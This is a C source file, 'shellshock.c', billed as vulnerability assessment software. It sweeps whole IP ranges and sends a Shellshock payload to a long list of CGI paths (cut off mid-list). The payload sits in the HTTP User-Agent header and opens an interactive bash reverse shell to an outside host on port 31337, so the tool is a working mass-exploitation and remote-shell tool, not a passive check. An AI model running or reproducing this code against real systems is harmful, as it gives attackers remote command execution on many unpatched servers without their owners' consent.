/* ** File : shellshock.c ** Author : Nicholas Lemonias ** ** This is proprietary source code material of Advanced Information Security Corporation. ** Usage, distribution and modifications are pursuant to our terms of agreement. ** ** ** Copyright (c) 2009-2014, Advanced Information Security Corporation as represented by the ** author of this software. ** All rights reserved. ** ** ** Web Vulnerability Assessement Software for Shellshock. ** FREE TRIAL - DEMO VERSION ** */ /**************************************************************************************** (c) 2014 Advanced Information Security Corporation ***************************************************************************************** /* Compilation: cc shellsock.c -o shellshock ** ** HOW-TO ** ** ./shellshock -i ** ./shellshock -a xx ** ./shellshock -b xxx.xx ** ./shellshock -c xxx.xxx.xxx */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include // #include #define PORT 80 #define TIMEOUT 3 // timing out? char server[500]; char *result; void usage(char *); void try(char *); static int i,x,y,z; char A(char *); char B(char *); char C(char *); char D(char *); static char a[4],b[8],c[12],ip[17]; int main(int argc, char *argv[]) { int ch, ascan, bscan, cscan, ipscan, temp = 0; char IP[128], printip[128]; if (argc < 2) { printf("**********************************************************************\n"); printf("(Advanced Information Security Corporation, 2014 - All Rights Reserved\n"); printf("**********************************************************************\n"); printf("\n"); printf("|Class A|: 1-126 N.H.H.H\n"); printf("**********************************************************************\n"); printf("|Class B|: 128-191 N.N.H.H\n"); printf("**********************************************************************\n"); printf("|Class C|: 192-223 N.N.N.H\n"); printf("**********************************************************************\n"); printf("|Class D|: 224-239 N.N.N.H\n"); printf("**********************************************************************\n"); printf("|Class E|: 240-254 N.N.N.H\n"); printf("|Private IP|: 10.0.0.0 - 255.255.255.255\n"); printf("**********************************************************************\n"); printf("\n"); printf("\nUsage:\n%s -i OR -a OR -b OR -c Accepted Values: 1-255\n\n", argv[0]); exit(0); } while ((ch = getopt(argc, argv, "i:a:b:c:")) != EOF) { switch (ch) { case 'i': snprintf(IP, sizeof IP - 1, "%s", optarg); IP[strcspn(IP, "\n")] = '\0'; ipscan = 1; break; case 'a': snprintf(IP, sizeof IP - 1, "%s", optarg); IP[strcspn(IP, "\n")] = '\0'; ascan = 1; break; case 'b': snprintf(IP, sizeof IP - 1, "%s", optarg); IP[strcspn(IP, "\n")] = '\0'; bscan = 1; break; case 'c': snprintf(IP, sizeof IP - 1, "%s", optarg); IP[strcspn(IP, "\n")] = '\0'; cscan = 1; break; } } if (ipscan == 1) { printf("Scanning IP %s\n", IP); try(IP); exit(1); } if (ascan == 1) { printf("Scanning class A %s.\n", IP); A(IP); } if (bscan == 1) { printf("Scanning class B %s.\n", IP); B(IP); } if (cscan == 1) { printf("Scanning class C %s.\n", IP); C(IP); } exit(0); } /* A */ char A(char *Aclass) { if(strlen(Aclass)>3) { printf("wrong range"); exit(-1); } for(x=0;x<=255;++x) { for(y=0;y<=255;++y) { for(z=0;z<=255;++z) { snprintf(ip,sizeof(ip),"%s.%d.%d.%d",Aclass,x,y,z); printf("trying %s\t->\t",ip); try(ip); } } } }/* end of A */ /* B */ char B(char *Bclass) { for(y=0;y<=255;++y) { for(z=0;z<=255;++z) { snprintf(ip,sizeof(ip),"%s.%d.%d",Bclass,y,z); printf("trying %s\t->\t",ip); try(ip); } } } /* end of B */ /* C */ char C(char *Cclass) { for(z=0;z<=255;++z) { if( !strcmp(ip,".4") ) exit(EXIT_FAILURE); snprintf(ip,sizeof(ip),"%s.%d",Cclass,z); printf("trying %s\t->\t",ip); try(ip); } } /* end of C */ /* try */ void try(char *IP) { char *buff[371]; char *bug[371]; char buffers[800]; char *buffer; char message[] = "HEAD / HTTP/1.1\n\r\n\r"; char *useragent = "() { :; }; /bin/bash -i >& /dev/tcp/your.domain.com/31337 0<&1 2>&1"; int i,sock; struct timeval tv; struct sockaddr_in remote; fd_set wset; fd_set rset; buff[1] = "GET /_mt/mt.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[2] = "GET /admin.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[3] = "GET /administrator.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[4] = "GET /agora.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[5] = "GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[6] = "GET /analyse.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[7] = "GET /apps/web/vs_diag.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[8] = "GET /axis-cgi/buffer/command.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[9] = "GET /bandwidth/index.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[10] = "GET /bigconf.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[11] = "GET /cart.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[12] = "GET /cartcart.cgi HTTP/1.0\nUser-Agent: %s\n\n"; buff[13] = "GET /ccbill/whereami.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[14] = "GET /cgi-bin/status HTTP/1.0\nUser-Agent:%s\n\n"; buff[15] = "GET /cgi-bin-sdb/printenv HTTP/1.0\nUser-Agent:%s\n\n"; buff[16] = "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[17] = "GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[18] = "GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[19] = "GET /cgi-bin/.namazu.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[20] = "GET /cgi-bin/14all-1.1.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[21] = "GET /cgi-bin/14all.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[22] = "GET /cgi-bin/a1disp3.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[23] = "GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[24] = "GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[25] = "GET /cgi-bin/add_ftp.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[26] = "GET /cgi-bin/addbanner.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[27] = "GET /cgi-bin/adduser.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[28] = "GET /cgi-bin/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[29] = "GET /cgi-bin/admin.pl HTTP/1.0\nUser-Agent:%s\n\n"; buff[30] = "GET /cgi-bin/admin/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[31] = "GET /cgi-bin/admin/setup.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[32] = "GET /cgi-bin/adminhot.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[33] = "GET /cgi-bin/adminwww.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[34] = "GET /cgi-bin/af.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[35] = "GET /cgi-bin/aglimpse.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[36] = "GET /cgi-bin/alienform.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[37] = "GET /cgi-bin/AnyBoard.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[38] = "GET /cgi-bin/architext_query.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[39] = "GET /cgi-bin/astrocam.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[40] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[41] = "GET /cgi-bin/AT-generate.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[42] = "GET /cgi-bin/auction/auction.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[43] = "GET /cgi-bin/auktion.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[44] = "GET /cgi-bin/ax-admin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[45] = "GET /cgi-bin/ax.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[46] = "GET /cgi-bin/axs.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[47] = "GET /cgi-bin/badmin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[48] = "GET /cgi-bin/banner.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[49] = "GET /cgi-bin/bannereditor.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[50] = "GET /cgi-bin/bb-ack.sh HTTP/1.0\nUser-Agent:%s\n\n"; buff[51] = "GET /cgi-bin/bb-hist.sh HTTP/1.0\nUser-Agent:%s\n\n"; buff[52] = "GET /cgi-bin/bb-histlog.sh HTTP/1.0\nUser-Agent:%s\n\n"; buff[53] = "GET /cgi-bin/bb-hostsvc.sh HTTP/1.0\nUser-Agent:%s\n\n"; buff[54] = "GET /cgi-bin/bb-rep.sh HTTP/1.0\nUser-Agent:%s\n\n"; buff[55] = "GET /cgi-bin/bb-replog.sh HTTP/1.0\nUser-Agent:%s\n\n"; buff[56] = "GET /cgi-bin/bbs_forum.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[57] = "GET /cgi-bin/bigconf.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[58] = "GET /cgi-bin/bizdb1-search.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[59] = "GET /cgi-bin/blog/mt-check.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[60] = "GET /cgi-bin/blog/mt-load.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[61] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[62] = "GET /cgi-bin/book.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[63] = "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[64] = "GET /cgi-bin/bsguest.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[65] = "GET /cgi-bin/bslist.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[66] = "GET /cgi-bin/build.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[67] = "GET cgi-bin/bulk/bulk.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[68] = "GET /cgi-bin/c_download.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[69] = "GET /cgi-bin/cached_feed.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[70] = "GET /cgi-bin/cachemgr.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[71] = "GET /cgi-bin/calendar/index.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[72] = "GET /cgi-bin/cartmanager.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[73] = "GET /cgi-bin/cbmc/forums.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[74] = "GET /cgi-bin/ccvsblame.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[75] = "GET /cgi-bin/cgforum.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[76] = "GET /cgi-bin/cgi_process HTTP/1.0\nUser-Agent:%s\n\n"; buff[77] = "GET /cgi-bin/classified.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[78] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[79] = "GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[80] = "GET /cgi-bin/classifieds/index.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[81] = "GET /cgi-bin/commandit.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[82] = "GET /cgi-bin/commerce.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[83] = "GET /cgi-bin/common/listrec.pl HTTP/1.0\nUser-Agent:%s\n\n"; buff[84] = "GET /cgi-bin/compatible.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[85] = "GET /cgi-bin/Count.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[86] = "GET /cgi-bin/csChatRBox.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[87] = "GET /cgi-bin/csGuestBook.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[88] = "GET /cgi-bin/csLiveSupport.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[89] = "GET /cgi-bin/CSMailto.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[90] = "GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[91] = "GET /cgi-bin/csNews.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[92] = "GET /cgi-bin/csNewsPro.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[93] = "GET /cgi-bin/csPassword.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[94] = "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[95] = "GET /cgi-bin/csSearch.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[96] = "GET /cgi-bin/csv_db.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[97] = "GET /cgi-bin/cvsblame.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[98] = "GET /cgi-bin/cvslog.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[99] = "GET /cgi-bin/cvsquery.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[100] = "GET /cgi-bin/cvsqueryform.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[101] = "GET /cgi-bin/day5datacopier.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[102] = "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[103] = "GET /cgi-bin/db_manager.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[104] = "GET /cgi-bin/dbman/db.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[105] = "GET /cgi-bin/dcforum.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[106] = "GET /cgi-bin/dfire.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[107] = "GET /cgi-bin/diagnose.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[108] = "GET /cgi-bin/dig.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[109] = "GET /cgi-bin/directorypro.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[110] = "GET /cgi-bin/download.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[111] = "GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[112] = "GET /cgi-bin/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[113] = "GET /cgi-bin/emumail/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[114] = "GET /cgi-bin/enter.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[115] = "GET /cgi-bin/environ.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[116] = "GET /cgi-bin/ezadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[117] = "GET /cgi-bin/ezboard.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[118] = "GET /cgi-bin/ezman.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[119] = "GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[120] = "GET /cgi-bin/ezshopper/search.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[121] = "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[122] = "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[123] = "GET /cgi-bin/faqmanager.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[124] = "GET /cgi-bin/FileSeek.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[125] = "GET /cgi-bin/FileSeek2.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[126] = "GET /cgi-bin/finger.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[127] = "GET /cgi-bin/flexform.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[128] = "GET /cgi-bin/fom.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[129] = "GET /cgi-bin/fom/fom.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[130] = "GET /cgi-bin/FormHandler.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[131] = "GET /cgi-bin/FormMail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[132] = "GET /cgi-bin/gbadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[133] = "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[134] = "GET /cgi-bin/generate.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[135] = "GET /cgi-bin/getdoc.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[136] = "GET /cgi-bin/gH.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[137] = "GET /cgi-bin/gm-authors.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[138] = "GET /cgi-bin/gm-cplog.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[139] = "GET /cgi-bin/gm.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[140] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[141] = "GET /cgi-bin/handler HTTP/1.0\nUser-Agent:%s\n\n"; buff[142] = "GET /cgi-bin/handler.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[143] = "GET /cgi-bin/handler/netsonar HTTP/1.0\nUser-Agent:%s\n\n"; buff[144] = "GET /cgi-bin/hitview.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[145] = "GET /cgi-bin/hsx.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[146] = "GET /cgi-bin/html2chtml.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[147] = "GET /cgi-bin/html2wml.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[148] = "GET /cgi-bin/htsearch.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[149] = "GET /cgi-bin/icat HTTP/1.0\nUser-Agent:%s\n\n"; buff[150] = "GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[151] = "GET /cgi-bin/ikonboard/help.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[152] = "GET /cgi-bin/imageFolio.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[153] = "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[154] = "GET /cgi-bin/infosrch.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[155] = "GET /cgi-bin/jammail.pl HTTP/1.0\nUser-Agent:%s\n\n"; buff[156] = "GET /cgi-bin/journal.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[157] = "GET /cgi-bin/lastlines.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[158] = "GET /cgi-bin/loadpage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[159] = "GET /cgi-bin/log-reader.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[160] = "GET /cgi-bin/login.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[161] = "GET /cgi-bin/logit.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[162] = "GET /cgi-bin/lookwho.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[163] = "GET /cgi-bin/lwgate.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[164] = "GET /cgi-bin/MachineInfo HTTP/1.0\nUser-Agent:%s\n\n"; buff[165] = "GET /cgi-bin/magiccard.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[166] = "GET /cgi-bin/mail/emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[167] = "GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[168] = "GET /cgi-bin/maillist.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[169] = "GET /cgi-bin/mailnews.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[170] = "GET /cgi-bin/main.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[171] = "GET /cgi-bin/main_menu.pl HTTP/1.0\nUser-Agent:%s\n\n"; buff[172] = "GET /cgi-bin/man.sh HTTP/1.0\nUser-Agent:%s\n\n"; buff[173] = "GET /cgi-bin/mini_logger.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[174] = "GET /cgi-bin/mmstdod.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[175] = "GET /cgi-bin/moin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[176] = "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[177] = "GET /cgi-bin/mrtg.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[178] = "GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[179] = "GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[180] = "GET /cgi-bin/mt/mt-check.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[181] = "GET /cgi-bin/mt/mt-load.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[182] = "GET /cgi-bin/musicqueue.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[183] = "GET /cgi-bin/myguestbook.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[184] = "GET /cgi-bin/netauth.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[185] = "GET /cgi-bin/netpad.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[186] = "GET /cgi-bin/newsdesk.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[187] = "GET /cgi-bin/nlog-smb.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[188] = "GET /cgi-bin/nph-emumail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[189] = "GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[190] = "GET /cgi-bin/nph-publish.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[191] = "GET /cgi-bin/nph-test.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[192] = "GET /cgi-bin/pagelog.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[193] = "GET /cgi-bin/pbcgi.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[194] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[195] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[196] = "GET /cgi-bin/pfdisplay.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[197] = "GET /cgi-bin/phf.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[198] = "GET /cgi-bin/photo/manage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[199] = "GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[200] = "GET /cgi-bin/php.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[201] = "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[202] = "GET /cgi-bin/pollssi.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[203] = "GET /cgi-bin/postcards.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[204] = "GET /cgi-bin/powerup/r.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[205] = "GET /cgi-bin/printenv HTTP/1.0\nUser-Agent:%s\n\n"; buff[206] = "GET /cgi-bin/probecontrol.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[207] = "GET /cgi-bin/profile.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[208] = "GET /cgi-bin/publisher/search.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[209] = "GET /cgi-bin/quickstore.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[210] = "GET /cgi-bin/quizme.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[211] = "GET /cgi-bin/r.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[212] = "GET /cgi-bin/ratlog.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[213] = "GET /cgi-bin/register.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[214] = "GET /cgi-bin/replicator/webpage.cgi/ HTTP/1.0\nUser-Agent:%s\n\n"; buff[215] = "GET /cgi-bin/responder.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[216] = "GET /cgi-bin/robadmin.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[217] = "GET /cgi-bin/robpoll.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[218] = "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[219] = "GET /cgi-bin/scoadminreg.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[220] = "GET /cgi-bin/search HTTP/1.0\nUser-Agent:%s\n\n"; buff[221] = "GET /cgi-bin/search.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[222] = "GET /cgi-bin/search/search.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[223] = "GET /cgi-bin/sendform.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[224] = "GET /cgi-bin/shop.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[225] = "GET /cgi-bin/shopper.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[226] = "GET /cgi-bin/shopplus.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[227] = "GET /cgi-bin/showcheckins.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[228] = "GET /cgi-bin/simplestguest.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[229] = "GET /cgi-bin/simplestmail.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[230] = "GET /cgi-bin/smartsearch.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[231] = "GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[232] = "GET /cgi-bin/snorkerz.bat HTTP/1.0\nUser-Agent:%s\n\n"; buff[233] = "GET /cgi-bin/snorkerz.cmd HTTP/1.0\nUser-Agent:%s\n\n"; buff[234] = "GET /cgi-bin/sojourn.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[235] = "GET /cgi-bin/spin_client.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[236] = "GET /cgi-bin/start.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[237] = "GET /cgi-bin/store.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[238] = "GET /cgi-bin/store/agora.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[239] = "GET /cgi-bin/store/index.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[240] = "GET /cgi-bin/survey.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[241] = "GET /cgi-bin/talkback.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[242] = "GET /cgi-bin/technote/main.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[243] = "GET /cgi-bin/test-cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[244] = "GET /cgi-bin/test.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[245] = "GET /cgi-bin/test/test.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[246] = "GET /cgi-bin/test2.pl HTTP/1.0\nUser-Agent:%s\n\n"; buff[247] = "GET /cgi-bin/testing_whatever HTTP/1.0\nUser-Agent:%s\n\n"; buff[248] = "GET /cgi-bin/tidfinder.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[249] = "GET /cgi-bin/tigvote.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[250] = "GET /cgi-bin/title.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[251] = "GET /cgi-bin/traffic.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[252] = "GET /cgi-bin/troops.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[253] = "GET /cgi-bin/ttawebtop.cgi/ HTTP/1.0\nUser-Agent:%s\n\n"; buff[254] = "GET /cgi-bin/ultraboard.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[255] = "GET /cgi-bin/upload.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[256] = "GET /cgi-bin/urlcount.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[257] = "GET /cgi-bin/viewcvs.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[258] = "GET /cgi-bin/viralator.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[259] = "GET /cgi-bin/virgil.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[260] = "GET /cgi-bin/vote.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[261] = "GET /cgi-bin/vpasswd.cgi HTTP/1.0\nUser-Agent:%s\n\n"; buff[262] = "GET /cgi-bin/way-board.cgi 